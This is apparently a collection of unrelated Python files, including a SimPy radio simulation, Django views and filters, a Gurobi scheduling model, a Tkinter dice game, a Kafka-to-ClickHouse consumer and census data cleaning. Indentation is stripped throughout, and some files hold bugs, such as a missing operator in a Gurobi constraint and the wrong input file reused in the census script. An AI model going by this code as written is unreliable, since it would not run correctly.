n0 = Node(0)
n1 = Node(1)
env.process(create_packet(n0, env))
tx = env.process(n0.run(env, None, n1, tx_rate, rx_rate))
rx = env.process(n1.run(env, n0, None, tx_rate, rx_rate))
env.run(until=SIM_TIME)
print("\n---INPUT---")
print("simulation time: %s" % format_time(SIM_TIME))
print("time between packets: %s" % format_time(TIME_BETWEEN_PACKETS))
f.write("{0},{1},".format(tx_ms, rx_ms))
if RANDOMIZATION_SCHEME == EXPOVARIATE:
print("randomization scheme: expovariate")
print("tx sleep rate: %f" % tx_rate)
print("rx sleep rate: %f" % rx_rate)
# print("tx sleep rate: %f" % TX_SLEEP_RATE)
# print("rx sleep rate: %f" % RX_SLEEP_RATE)
else:
print("randomization scheme: randint")
print('tx range = (%d, %d)' % TX_SLEEP_RANGE)
print('rx range = (%d, %d)' % RX_SLEEP_RANGE)
print("\n---RESULTS---")
pkt_success = len(n1.packet_list) / packet_number
n0_awake_time = (SIM_TIME - n0.sleep_time_total) / SIM_TIME * 100
n1_awake_time = (SIM_TIME - n1.sleep_time_total) / SIM_TIME * 100
print("packets: %d/%d" % (len(n1.packet_list), packet_number))
print("node 0 awake time: {0:.5f}%".format(n0_awake_time))
print("node 1 awake time: {0:.5f}%\n".format(n1_awake_time))
avg_time_to_transmit_packet = n0.tx_mode_ticks / packet_number
print('avg time to transmit packet = %s' % format_time(avg_time_to_transmit_packet))
f.write("{0},{1},{2},{3}\n".format(pkt_success, n0_awake_time, n1_awake_time, avg_time_to_transmit_packet))
f.close()
if __name__ == '__main__':
#varying_rate()
f = open("differing_rate.csv", "w")
f.write("tx_rate,rx_rate,pkt_success,n0_awake_time,n1_awake_time,avg_transmission_time_per_pkt\n")
x, y = np.meshgrid(TX_SLEEP_RATES,RX_SLEEP_RATES)
#print(x)
#print(y)
for col, row in zip(x, y):
for tx_ms, rx_ms in zip(col, row):
#print("tx: {0} rx: {1}".format(tx_ms, rx_ms))
f.write("{0},{1},".format(tx_ms, rx_ms))
tx_rate = 1 / tx_ms
rx_rate = 1 / rx_ms
packet_number = 0
env = simpy.Environment()
n0 = Node(0)
n1 = Node(1)
env.process(create_packet(n0, env))
tx = env.process(n0.run(env, None, n1, tx_rate, rx_rate))
rx = env.process(n1.run(env, n0, None, tx_rate, rx_rate))
env.run(until=SIM_TIME)
print("\n---INPUT---")
print("simulation time: %s" % format_time(SIM_TIME))
print("time between packets: %s" % format_time(TIME_BETWEEN_PACKETS))
f.write("{0},{1},".format(tx_ms, rx_ms))
if RANDOMIZATION_SCHEME == EXPOVARIATE:
print("randomization scheme: expovariate")
print("tx sleep rate: %f" % tx_rate)
print("rx sleep rate: %f" % rx_rate)
# print("tx sleep rate: %f" % TX_SLEEP_RATE)
# print("rx sleep rate: %f" % RX_SLEEP_RATE)
else:
print("randomization scheme: randint")
print('tx range = (%d, %d)' % TX_SLEEP_RANGE)
print('rx range = (%d, %d)' % RX_SLEEP_RANGE)
print("\n---RESULTS---")
pkt_success = len(n1.packet_list) / packet_number
n0_awake_time = (SIM_TIME - n0.sleep_time_total) / SIM_TIME * 100
n1_awake_time = (SIM_TIME - n1.sleep_time_total) / SIM_TIME * 100
print("packets: %d/%d" % (len(n1.packet_list), packet_number))
print("node 0 awake time: {0:.5f}%".format(n0_awake_time))
print("node 1 awake time: {0:.5f}%\n".format(n1_awake_time))
avg_time_to_transmit_packet = n0.tx_mode_ticks / packet_number
print('avg time to transmit packet = %s' % format_time(avg_time_to_transmit_packet))
f.write("{0},{1},{2},{3}\n".format(pkt_success, n0_awake_time, n1_awake_time, avg_time_to_transmit_packet)) |
from django import template
register = template.Library()
@register.filter
def addCss(value, arg):
return value.as_widget(attrs={'class':arg})
|
assert (True and True) == True
assert (True and False) == False
assert (False and True) == False
assert (False and False) == False
assert (True or True) == True
assert (True or False) == True
assert (False or True) == True
assert (False or False) == False
assert (not True) == False
assert (not False) == True |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Wed Feb 5 22:38:43 2020
@author: hoale
"""
"""
This file contains solver for feasibility problem by GUROBI (2nd MILP subproblem)
"""
import gurobi as grb
""" Creation of MILP model with constraints """
def _create_model(job_num, machine_num, job_ids, r_times, d_times, p_intervals, assign, prev_start_time):
""" Set I' is set of jobs assigned to machines, their assign variable equal to 1"""
# for i_id in range(job_num):
# for m_id in range(machine_num):
# if assign[(i_id, m_id)].x == 1:
# set_I_apos.append(i_id)
set_I_apos = [i_id for m_id in range(machine_num) for i_id in range(job_num) if assign[(i_id, m_id)].x == 1]
z_apos = {i_id: m_id for m_id in range(machine_num) for i_id in range(job_num) if assign[(i_id, m_id)].x == 1}
""" Prepare the index for decision variables """
# start time of process
jobs = tuple(job_ids)
print("inside:", jobs)
machines = tuple(range(machine_num))
print(machines)
# sequence of processing jobs: tuple list
job_pairs_apos = [(i, j) for i in set_I_apos for j in set_I_apos if i != j]
print(job_pairs_apos)
# assignment of jobs on machines
job_machine_pairs = [(i, m) for i in jobs for m in machines]
print(job_machine_pairs)
# dissimilar parallel machine-machine pair
machine_pairs = [(m, n) for m in machines for n in machines if m != n]
""" Parameters model (dictionary) """
# 1. release time
release_time = dict(zip(jobs, tuple(r_times)))
print("release time:", release_time)
# 2. due time
due_time = dict(zip(jobs, tuple(d_times)))
print("due time:", due_time)
# 3. processing time
process_time = dict(zip(jobs, tuple(p_intervals)))
print("process time:", process_time)
# # 4. processing cost
# job_cost = dict(zip(jobs, tuple(p_cost)))
# print("processing cost:", job_cost)
# 5. define BigU
for i in range(job_num):
print(max(p_intervals[i]))
U = sum([max(p_intervals[i]) for i in range(job_num)])
print("test U:", U)
""" Create model """
model = grb.Model("SSJSP")
""" Create decision variables """
# 1. Assignments of jobs on machines
x = model.addVars(job_machine_pairs, vtype=grb.GRB.BINARY, name="assign")
# 2. Sequence (Order) of executing jobs
y = model.addVars(job_pairs_apos, vtype=grb.GRB.BINARY, name="sequence")
# 3. Start time of executing each job (ts = time_start)
ts = model.addVars(jobs, lb=0, name="start_time")
""" Create the objective function """
model.setObjective(0)
""" Create constraints """
# 1. job release time constraint
model.addConstrs((ts[i] >= release_time[i] for i in set_I_apos), name="assigned job release constraint")
# 2. job due time constraint
model.addConstrs((ts[i] <= due_time[i] - process_time[i][z_apos[i]] for i in jobs), name="assigned job due constraint")
# # 3. one job is assigned to one and only one machine
# model.addConstrs((grb.quicksum([x[(i,m)] for m in machines]) == 1 for i in jobs),
# name="job non-splitting constraint")
# # 4. job 'j' is processed after job 'i' when both jobs are assigned to same machine
# model.addConstrs((y[(i,j)] + y[(j,i)] >= x[(i,m)] + x[(j,m)] - 1 for m in machines for (i,j) in job_pairs if j > i),
# name="assignment-sequencing vars constraint")
# # 5. sequencing constraint
# model.addConstrs((ts[j] >= ts[i] + grb.quicksum([process_time[i][m]*x[(i,m)] for m in machines])
# - U*(1 - y[(i,j)]) for (i,j) in job_pairs),
# name="sequence constraint")
# 6. when assigned, either job 'i' is processed before job 'j' or vice versa
model.addConstrs((y[(i,j)] + y[(j,i)] == 1 for (i,j) in job_pairs_apos if i > j), name="sequence of assigned jobs")
# # 7. sequencing varibles = 0 when job 'i' and 'j' are assigned to different machines
# model.addConstrs((y[(i,j)] + y[(j,i)] + x[(i,m)] + x[(j,n)] <= 2
# for (m,n) in machine_pairs for (i,j) in job_pairs if j > i),
# name="different machine constraint")
# 8. valid cut, starting times, using latest due date as big-M parameter
model.addConstrs((ts[j] >= ts[i] + process_time[i][z_apos[i]] - max(due_time.values())(1 - y[(i,j)])
for (i,j) in job_pairs_apos), name="valid cut by big-M")
return model, y, ts |
"""ecomproject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/3.2/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import path, include
from django.conf import settings
from django.conf.urls.static import static
from order import views as OrderViews
from user import views as UserViews
from home import views as HomeViews
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('home.urls')),
path('product/', include('product.urls')),
path('order/', include('order.urls')),
path('ckeditor/', include('ckeditor_uploader.urls')),
path('user/', include('user.urls')),
path('shopcart/', OrderViews.shopcart, name='shopcart'),
path('login/', UserViews.login_page, name="login"),
path('signup/', UserViews.signup_page, name="signup"),
path('logout/', UserViews.logout_page, name="logout"),
path('faq/', HomeViews.Faq, name="faq"),
]
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
__author__ = 'Dos Santos Julien'
import random
from Tkinter import *
from tkMessageBox import *
class De(StringVar):
def __init__(self):
StringVar.__init__(self)
self.set(random.randrange(1,6))
self.keep = IntVar()
def lancer(self):
if self.keep.get() == 0:
self.set(random.randrange(1,6))
class Jeu(Tk):
def __init__(self):
Tk.__init__(self)
self.count = 0
self.d1, self.d2, self.d3 = De(),De(),De()
self.btLancer = Button(self, text="Lancer", command=self.lancer)
self.raz = Button(self,text="RAZ",command=self.raz)
self.exit = Button(self,text="Quitter",command=self.exit)
self.c1 = Checkbutton(text="Keep ?", variable=self.d1.keep,onvalue=True, offvalue=False)
self.c2 = Checkbutton(text="Keep ?", variable=self.d2.keep,onvalue=True, offvalue=False)
self.c3 = Checkbutton(text="Keep ?", variable=self.d3.keep,onvalue=True, offvalue=False)
self.label1 = Label(self,textvariable=self.d1)
self.label12 = Label(self,textvariable=self.d2)
self.label3 = Label(self,textvariable=self.d3)
self.label1.pack()
self.label12.pack()
self.label3.pack()
self.btLancer.pack()
self.raz.pack()
self.exit.pack()
self.c1.pack()
self.c2.pack()
self.c3.pack()
self.mainloop()
def lancer(self):
self.d1.lancer()
self.d2.lancer()
self.d3.lancer()
self.count += 1
self.check()
def raz(self):
print str(self.count)
print "raz"
self.lancer()
self.count = 0
self.c1.deselect()
self.c2.deselect()
self.c3.deselect()
print str(self.count)
def check(self):
if (int(self.d1.get()) + int(self.d2.get()) + int(self.d3.get())) == 7:
if(int(self.d1.get()) == 4 or int(self.d2.get()) == 4 or int(self.d3.get()) == 4):
showinfo('Résultat', 'Vous avez gagné en %d coups' % (self.count))
def exit(self):
showwarning('Quitter', 'Etes-vous sur de vouloir quitter ?')
self.quit() |
from setuptools import setup
import os, re
with open("README.md", "r") as fh:
long_description = fh.read()
def get_version() -> str:
"""Get __version__ from __init__.py file."""
version_file = os.path.join(os.path.dirname(__file__), "kivg", "__init__.py")
version_file_data = open(version_file, "rt", encoding="utf-8").read()
version_regex = r"(?<=^__version__ = ['\"])[^'\"]+(?=['\"]$)"
try:
version = re.findall(version_regex, version_file_data, re.M)[0]
return version
except IndexError:
raise ValueError(f"Unable to find version string in {version_file}.")
setup(
name="Kivg",
version=get_version(),
packages=["kivg"],
package_data={"kivg": ["*.py",],},
# metadata to display on PyPI
author="Shashi Ranjan",
author_email="shashiranjankv@gmail.com",
description="SVG path drawing and animation support in kivy application",
long_description=long_description,
long_description_content_type="text/markdown",
keywords="svg svg-animations svg-path svg-images kivy-application kivy python",
url="https://github.com/shashi278/svg-anim-kivy",
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: Android",
"Operating System :: Microsoft :: Windows",
"Operating System :: OS Independent"
],
install_requires=["kivy>=2.0.0", "svg.path==4.1"],
python_requires=">=3.6",
) |
import django_filters
from django.db.models import Q
from .models import Articles
import datetime
class ArticlesFilter(django_filters.rest_framework.FilterSet):
"""
文章的过滤类
"""
time = django_filters.CharFilter(method='time_filter')
category = django_filters.NumberFilter(method='category_filter')
def category_filter(self, queryset, name, value):
return queryset.filter(Q(category_id=value) | Q(category__parent_category_id=value))
def time_filter(self, queryset, name, value):
return queryset.filter(add_time__icontains=value)
class Meta:
model = Articles
fields = []
|
import logging
from PyQt4.QtGui import QDialog, QVBoxLayout
from gui.widgets.itemwidget import ItemWidget
from gui.widgets.ui_basesettingsdialog import Ui_BaseSettingsDialog
logger = logging.getLogger('console')
class WellSettingsDialog(QDialog, Ui_BaseSettingsDialog):
'''
classdocs
'''
def __init__(self, well, parent= None):
super(WellSettingsDialog, self).__init__(parent)
self._well = well
self.setupUi(self)
self.addWidgets()
self.populateData()
def addWidgets(self):
itemWidget = ItemWidget()
vBoxlayout = QVBoxLayout()
vBoxlayout.addWidget(itemWidget)
self.itemTab.setLayout(vBoxlayout)
def populateData(self):
pass
|
#!/usr/bin/python
import pylsdj
import sys
import os.path
# check argv length
if (len(sys.argv) < 4):
sys.exit('Usage : python patcher.py ([SAVEFILE.sav] [#TRACKNUMBER] or [SONGFILE.srm|.lsdsng]) [SYNTH.snt] [#SYNTHNUMBER]')
# get file patcher
savpath = sys.argv[1]
ext = os.path.splitext(savpath)[1]
# check data depending on extension and gather project file
if ext == '.sav':
# get cmdline args
synthpath = sys.argv[3]
synthnumber = int(sys.argv[4])
# load .sav file
sav = pylsdj.SAVFile(savpath)
# get project
project = sav.projects[int(sys.argv[2])]
elif ext == '.srm' or ext == '.lsdsng':
# get cmdline args
synthpath = sys.argv[2]
synthnumber = int(sys.argv[3])
# get project
project = pylsdj.load_srm(savpath) if ext == '.srm' else pylsdj.load_lsdsng(savpath)
else:
sys.exit('Invalid savefile/songfile (extension ' + ext + ' unsupported).')
# get song
song = project.song
# get synth
synth = song.synths[synthnumber]
# read bin file
with open(synthpath, 'rb') as f:
synthdata = f.read()
# chunk synth data
synthdata = [synthdata[x:x+16] for x in range(0, len(synthdata), 16)]
for i in range(len(synthdata)):
for j in range(len(synthdata[i])):
try:
synth.waves[i][2*j] = ord(synthdata[i][j]) >> 4
except:
synth.waves[i][2*j] = synthdata[i][j] >> 4
try:
synth.waves[i][2*j+1] = ord(synthdata[i][j]) & 0x0F
except:
synth.waves[i][2*j+1] = synthdata[i][j] & 0x0F
# save modified file
if ext == '.sav':
sav.save(savpath)
print(savpath + ' saved!')
elif ext == '.srm':
project.save_srm(savpath)
print(savpath + ' saved!')
elif ext == '.lsdsng':
project.save_lsdsng(savpath)
print(savpath + ' saved!')
else:
sys.exit('Invalid savefile/songfile (extension ' + ext + ' unsupported).')
|
from kafka import KafkaConsumer
import json, datetime
from clickhouse_driver import Client
consumer = KafkaConsumer('analytics', auto_offset_reset='earliest', bootstrap_servers=['localhost:9092'], api_version=(0, 10), consumer_timeout_ms=1000, value_deserializer=lambda m: json.loads(m.decode('utf-8')))
client = Client(host='localhost', password='123')
client.execute('CREATE DATABASE IF NOT EXISTS telegram')
create_channels_query = '''
CREATE TABLE IF NOT EXISTS telegram.channels
(
channel_id String,
sender_name String,
UUID UUID,
views Int32,
timestamp Float32,
date DateTime
)
ENGINE = MergeTree
PARTITION BY date ORDER BY (timestamp)
'''
create_keywords_query = '''
CREATE TABLE IF NOT EXISTS telegram.keywords
(
keyword String,
sender_name String,
timestamp Float32,
date DateTime
)
ENGINE = MergeTree
PARTITION BY date ORDER BY (timestamp)
'''
client.execute(create_channels_query)
client.execute(create_keywords_query)
while(True):
for item in consumer:
new_item = item.value
client.execute(
'INSERT INTO telegram.channels (channel_id, sender_name, UUID, views, timestamp, date) VALUES',
[( str(new_item['peer_id']['channel_id']), new_item['sender_name'], new_item['UUID'], new_item['views'], new_item['timestamp'], datetime.datetime.strptime(new_item['date'] + 'T' + new_item['time'], "%Y-%m-%dT%H:%M:%S") )]
)
for kw in new_item['hashtags'] + new_item['keywords']:
client.execute(
'INSERT INTO telegram.keywords (keyword, sender_name, timestamp, date) VALUES',
[( kw, new_item['sender_name'], new_item['timestamp'], datetime.datetime.strptime(new_item['date'] + 'T' + new_item['time'], "%Y-%m-%dT%H:%M:%S") )]
)
print(datetime.datetime.now(),"new message inserted into clickhouse")
#client.execute('DROP TABLE telegram.channels')
# client.execute('DROP TABLE telegram.keywords')
# client.execute('DROP DATABASE telegram') |
from models import RobotKiller
from django.utils import timezone
from django.core.exceptions import PermissionDenied
max_visits = 100
min_seconds = 300
def ip_bot_filter(request):
allowed_ips = ['10', '127.0.0.1'] # localhost
#allowed_ips = ['10', '60.205.107.184', '211.144.0.55']
if request.META.has_key('HTTP_X_FORWARDED_FOR'):
request_ip = request.META['HTTP_X_FORWARDED_FOR']
else:
request_ip = request.META['REMOTE_ADDR']
# print request_ip
if request_ip[:2] in allowed_ips or request_ip in allowed_ips:
try:
record = RobotKiller.objects.get(ip=request_ip)
except RobotKiller.DoesNotExist:
RobotKiller.objects.create(ip=request_ip, visits=1, time=timezone.now(), status='allowed')
return
passed_seconds = (timezone.now() - record.time).seconds
if record.visits > max_visits and passed_seconds < min_seconds and record.status == 'banned':
record.status = 'banned'
#return False
raise Exception
else:
if passed_seconds < min_seconds:
record.visits = record.visits + 1
record.save()
else:
record.visits = 1
record.time = timezone.now()
record.save()
#return True
else:
#return False
raise Exception
|
import datetime
from dateutil.parser import parse
from django.contrib import messages
from django.contrib.admin.views.decorators import staff_member_required
from django.contrib.auth.mixins import LoginRequiredMixin
from django.http import HttpResponseRedirect
from django.shortcuts import render
from django.template.defaultfilters import pluralize
from django.urls import reverse
from django.utils import timezone
from django.views.generic import CreateView, TemplateView
from homeschool.core.schedules import Week
from homeschool.courses.models import GradedWork
from homeschool.schools.forms import GradeLevelForm, SchoolYearForm
from homeschool.schools.models import GradeLevel, SchoolYear
from homeschool.students.models import Coursework, Grade, Student
class IndexView(TemplateView):
template_name = "core/index.html"
class AppView(LoginRequiredMixin, TemplateView):
template_name = "core/app.html"
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
today = self.request.user.get_local_today()
year = self.kwargs.get("year")
month = self.kwargs.get("month")
day = self.kwargs.get("day")
if year and month and day:
day = datetime.date(year, month, day)
else:
day = today
context["day"] = day
week = Week(day)
# Fix the corner case when the weekly view is used and today falls in the week.
# In that scenario, don't point at the first day of the week
# since it messes with the UI.
if week.monday <= today <= week.sunday:
context["day"] = today
context["monday"], context["sunday"] = week.monday, week.sunday
context["previous_week_date"] = context["monday"] - datetime.timedelta(days=7)
context["next_week_date"] = context["monday"] + datetime.timedelta(days=7)
school_year = (
SchoolYear.objects.filter(
school=self.request.user.school,
start_date__lte=today,
end_date__gte=today,
)
.prefetch_related("grade_levels", "grade_levels__courses")
.first()
)
week_dates = []
if school_year:
week_dates = school_year.get_week_dates_for(week)
context["week_dates"] = week_dates
context["schedules"] = self.get_schedules(school_year, today, week)
return context
def get_schedules(self, school_year, today, week):
"""Get the schedules for each student."""
schedules: list = []
if school_year is None:
return schedules
for student in Student.get_students_for(school_year):
schedule = student.get_week_schedule(school_year, today, week)
schedules.append(schedule)
return schedules
class DailyView(LoginRequiredMixin, TemplateView):
template_name = "core/daily.html"
def get_context_data(self, *args, **kwargs):
context = super().get_context_data(*args, **kwargs)
today = self.request.user.get_local_today()
year = self.kwargs.get("year")
month = self.kwargs.get("month")
day = self.kwargs.get("day")
if year and month and day:
day = datetime.date(year, month, day)
else:
day = today
context["day"] = day
school_year = (
SchoolYear.objects.filter(
school=self.request.user.school, start_date__lte=day, end_date__gte=day
)
.prefetch_related("grade_levels", "grade_levels__courses")
.first()
)
# When the school year isn't in progress yet,
# the offset calculations should come
# relative to the start of the school year.
if school_year and today < school_year.start_date:
today = school_year.start_date
# Set previous and next days navigation.
if school_year:
context["yesterday"] = school_year.get_previous_day_from(day)
context["ereyesterday"] = school_year.get_previous_day_from(
context["yesterday"]
)
context["tomorrow"] = school_year.get_next_day_from(day)
context["overmorrow"] = school_year.get_next_day_from(context["tomorrow"])
else:
context["ereyesterday"] = day - datetime.timedelta(days=2)
context["yesterday"] = day - datetime.timedelta(days=1)
context["tomorrow"] = day + datetime.timedelta(days=1)
context["overmorrow"] = day + datetime.timedelta(days=2)
context["schedules"] = self.get_schedules(school_year, today, day)
return context
def get_schedules(self, school_year, today, day):
"""Get the schedules for each student."""
schedules: list = []
if not school_year:
return schedules
if not school_year.runs_on(day):
return schedules
for student in Student.get_students_for(school_year):
courses = student.get_courses(school_year)
schedule = self.get_student_schedule(student, today, day, courses)
schedules.append(schedule)
return schedules
def get_student_schedule(self, student, today, day, courses):
"""Get the daily schedule for the student."""
day_coursework = student.get_day_coursework(day)
completed_task_ids = list(
Coursework.objects.filter(
student=student, course_task__course__in=courses
).values_list("course_task_id", flat=True)
)
schedule = {"student": student, "courses": []}
for course in courses:
course_schedule = {"course": course}
if course.id in day_coursework:
course_schedule["coursework"] = day_coursework[course.id]
elif course.runs_on(day):
task_index = max(course.get_task_count_in_range(today, day) - 1, 0)
# Doing this query in a loop is definitely an N+1 bug.
# If it's possible to do a single query of all tasks
# that groups by course then that would be better.
# No need to over-optimize until that's a real issue.
# I brought this up on the forum. It doesn't look like it's easy to fix.
# https://forum.djangoproject.com/t/grouping-by-foreignkey-with-a-limit-per-group/979
try:
course_schedule["task"] = student.get_tasks_for(course).exclude(
id__in=completed_task_ids
)[task_index]
except IndexError:
course_schedule["no_scheduled_task"] = True
schedule["courses"].append(course_schedule)
return schedule
def post(self, request, *args, **kwargs):
"""Process students' work."""
completed_date = timezone.now().date()
if "completed_date" in request.POST:
completed_date = parse(request.POST["completed_date"])
tasks_by_student = self.get_task_completions_by_student(request.POST)
work_to_grade = False
if tasks_by_student:
for student_id, tasks in tasks_by_student.items():
student = request.user.school.students.filter(id=student_id).first()
if student:
has_work_to_grade = self.mark_completion(
student, tasks, completed_date
)
if has_work_to_grade:
work_to_grade = True
if work_to_grade:
success_url = self.get_grade_url()
else:
success_url = request.GET.get("next", reverse("core:daily"))
return HttpResponseRedirect(success_url)
def get_task_completions_by_student(self, post_data):
"""Parse out the tasks."""
tasks: dict = {}
for key, value in post_data.items():
if not key.startswith("task"):
continue
parts = key.split("-")
student_id = int(parts[1])
task_id = int(parts[2])
if student_id not in tasks:
tasks[student_id] = {"complete": [], "incomplete": []}
category = "complete" if value == "on" else "incomplete"
tasks[student_id][category].append(task_id)
return tasks
def get_grade_url(self):
grade_url = reverse("students:grade")
next_url = self.request.GET.get("next", reverse("core:daily"))
return f"{grade_url}?next={next_url}"
def mark_completion(self, student, tasks, completed_date):
"""Mark completed tasks or clear already complete tasks."""
has_work_to_grade = self.process_complete_tasks(
student, tasks["complete"], completed_date
)
self.process_incomplete_tasks(student, tasks["incomplete"])
return has_work_to_grade
def process_complete_tasks(self, student, complete_task_ids, completed_date):
"""Add coursework for any tasks that do not have it."""
has_work_to_grade = False
existing_complete_task_ids = set(
Coursework.objects.filter(
student=student, course_task__in=complete_task_ids
).values_list("course_task_id", flat=True)
)
newly_complete_task_ids = set(complete_task_ids) - existing_complete_task_ids
if newly_complete_task_ids:
new_coursework = []
for task_id in newly_complete_task_ids:
new_coursework.append(
Coursework(
student=student,
course_task_id=task_id,
completed_date=completed_date,
)
)
Coursework.objects.bulk_create(new_coursework)
pluralized = pluralize(len(newly_complete_task_ids))
message = "Completed {} task{} for {}.".format(
len(newly_complete_task_ids), pluralized, student.full_name
)
messages.add_message(self.request, messages.SUCCESS, message)
graded_work_ids = set(
GradedWork.objects.filter(
course_task__in=newly_complete_task_ids
).values_list("id", flat=True)
)
already_graded_work_ids = set(
Grade.objects.filter(
student=student, graded_work__in=graded_work_ids
).values_list("graded_work_id", flat=True)
)
has_work_to_grade = bool(graded_work_ids - already_graded_work_ids)
return has_work_to_grade
def process_incomplete_tasks(self, student, incomplete_task_ids):
"""Remove any coursework for tasks that are marked as incomplete."""
delete_info = Coursework.objects.filter(
student=student, course_task__in=incomplete_task_ids
).delete()
coursework_deleted = delete_info[0]
if coursework_deleted > 0:
pluralized = pluralize(coursework_deleted)
message = "Undid {} task{} for {}.".format(
coursework_deleted, pluralized, student.full_name
)
messages.add_message(self.request, messages.SUCCESS, message)
class StartView(LoginRequiredMixin, TemplateView):
template_name = "core/start.html"
class StartSchoolYearView(LoginRequiredMixin, CreateView):
template_name = "core/start_school_year.html"
form_class = SchoolYearForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["school_year"] = SchoolYear.objects.filter(
school=self.request.user.school
).first()
return context
def get_success_url(self):
return reverse("core:start-grade-level")
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.request.user
if "data" in kwargs:
# Since this view is for easy onboarding,
# set a reasonable standard week.
# The QueryDict is immutable so it must be copied to update it.
data = kwargs["data"].copy()
data.update(
{
"monday": True,
"tuesday": True,
"wednesday": True,
"thursday": True,
"friday": True,
}
)
kwargs["data"] = data
return kwargs
class StartGradeLevelView(LoginRequiredMixin, CreateView):
template_name = "core/start_grade_level.html"
form_class = GradeLevelForm
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context["grade_level"] = GradeLevel.objects.filter(
school_year__school=self.request.user.school
).first()
context["school_year"] = SchoolYear.objects.filter(
school=self.request.user.school
).first()
return context
def get_success_url(self):
return reverse("core:start-course")
def get_form_kwargs(self):
kwargs = super().get_form_kwargs()
kwargs["user"] = self.request.user
return kwargs
class StartCourseView(LoginRequiredMixin, TemplateView):
template_name = "core/start_course.html"
class StartCourseTaskView(LoginRequiredMixin, TemplateView):
template_name = "core/start_course.html"
@staff_member_required
def boom(request):
"""This is for checking error handling (like Rollbar)."""
raise Exception("Is this thing on?")
def handle_500(request):
"""Handle 500 errors and display them."""
return render(request, "500.html", {}, status=500)
|
import os
from zipfile import ZipFile
from datetime import datetime
import pandas as pd
import numpy as np
import re
folder = '/Users/kayinho/git/hispanic/'
extension = ".zip"
def unzip_all(dir):
for item in os.listdir(dir):
if item.endswith(extension):
path = folder+item
with ZipFile(path,'r') as zip_ref:
zip_ref.extractall('data')
unzip_all(os.path.join(folder,'zipped_data/'))
def modify_unwanted(dir):
for item in os.listdir(dir):
if (item.endswith('txt')) or ('metadata' in item):
path = dir+item
os.remove(path)
if (item.startswith('ACS')):
name = item.split('_')
newName = dir+name[0]+'.csv'
os.rename(os.path.join(dir,item), os.path.join(dir,newName))
datafolder = '/Users/kayinho/git/hispanic/data/'
modify_unwanted(datafolder)
chiZCTA = 'data/CityofChicago_Zip_Codes.csv'
zipCodeData = pd.read_csv(os.path.join(folder,chiZCTA), sep=',', header=0)
chiZC = pd.DataFrame(zipCodeData['ZIP'].unique().astype(str), columns=[('Zip Code','Chicago')]).astype('string')
population_all = 'data/ACSDP5Y2018.DP05.csv'
population = 'data/ACSDT5Y2018.B03003.csv'
healthcare = 'data/ACSDT5Y2018.C27001I.csv'
immigrant = 'data/ACSDT5Y2018.B05003I.csv'
language = 'data/ACSDT5Y2018.B16005I.csv'
jobs = 'data/ACSDT5Y2018.C24010I.csv'
transportation = 'data/ACSDT5Y2018.B08105I.csv'
relative = 'data/ACSDT5Y2018.B11002I.csv'
grandparents = 'data/ACSDT5Y2018.B10051I.csv'
occupants = 'data/ACSDT5Y2018.B25014I.csv'
income = 'data/ACSDT5Y2018.B19001I.csv'
foodstamp = 'data/ACSDT5Y2018.B22005I.csv'
poverty = 'data/ACSDT5Y2018.B17020I.csv'
def filter_for_CHI(file):
df = pd.read_csv(os.path.join(folder,file),sep=',',header=[0,1])
df[('NAME','Geographic Area Name')] = df[('NAME','Geographic Area Name')].astype('string')
for i in range(len(df)):
df[('NAME','Geographic Area Name')][i] = df[('NAME','Geographic Area Name')][i].replace('ZCTA5 ','')
chi_df = pd.merge(chiZC,df,'left', left_on=[('Zip Code','Chicago')], right_on=[('NAME','Geographic Area Name')], left_index=False)
chi_df.columns = df.columns.insert(loc = 0, item=('Zip Code','Chicago'))
chi_df = chi_df.sort_values(by=[('Zip Code','Chicago')])
return chi_df
population_all_chi_df = filter_for_CHI(os.path.join(folder,population_all))
#population_all_chi_df.to_csv(os.path.join(datafolder,'CHI_DP05.csv'), index = False)
population_all_chi_df
population_chi_df = filter_for_CHI(os.path.join(folder,population))
#population_chi_df.to_csv(os.path.join(datafolder,'CHI_B03003.csv'), index = False)
healthcare_chi_df = filter_for_CHI(os.path.join(folder,healthcare))
#healthcare_chi_df.to_csv(os.path.join(datafolder,'CHI_C27001I.csv'), index = False)
immigrant_chi_df = filter_for_CHI(os.path.join(folder,immigrant))
#immigrant_chi_df.to_csv(os.path.join(datafolder,'CHI_B05003I.csv'), index = False)
language_chi_df = filter_for_CHI(os.path.join(folder,language))
#language_chi_df.to_csv(os.path.join(datafolder,'CHI_B16005I.csv'), index = False)
jobs_chi_df = filter_for_CHI(os.path.join(folder,jobs))
#jobs_chi_df.to_csv(os.path.join(datafolder,'CHI_C24010I.csv'), index = False)
transportation_chi_df = filter_for_CHI(os.path.join(folder,transportation))
#transportation_chi_df.to_csv(os.path.join(datafolder,'CHI_B08105I.csv'), index = False)
relative_chi_df = filter_for_CHI(os.path.join(folder,relative))
#relative_chi_df.to_csv(os.path.join(datafolder,'CHI_B11002I.csv'), index = False)
grandparents_chi_df = filter_for_CHI(os.path.join(folder,grandparents))
#grandparents_chi_df.to_csv(os.path.join(datafolder,'CHI_B10051I.csv'), index = False)
occupants_chi_df = filter_for_CHI(os.path.join(folder,occupants))
#occupants_chi_df.to_csv(os.path.join(datafolder,'CHI_B25014I.csv'), index = False)
income_chi_df = filter_for_CHI(os.path.join(folder,immigrant))
#income_chi_df.to_csv(os.path.join(datafolder,'CHI_B19001I.csv'), index = False)
foodstamp_chi_df = filter_for_CHI(os.path.join(folder,immigrant))
#foodstamp_chi_df.to_csv(os.path.join(datafolder,'CHI_B22005I.csv'), index = False)
poverty_chi_df = filter_for_CHI(os.path.join(folder,immigrant))
#poverty_chi_df.to_csv(os.path.join(datafolder,'CHI_B17020I.csv'), index = False)
|
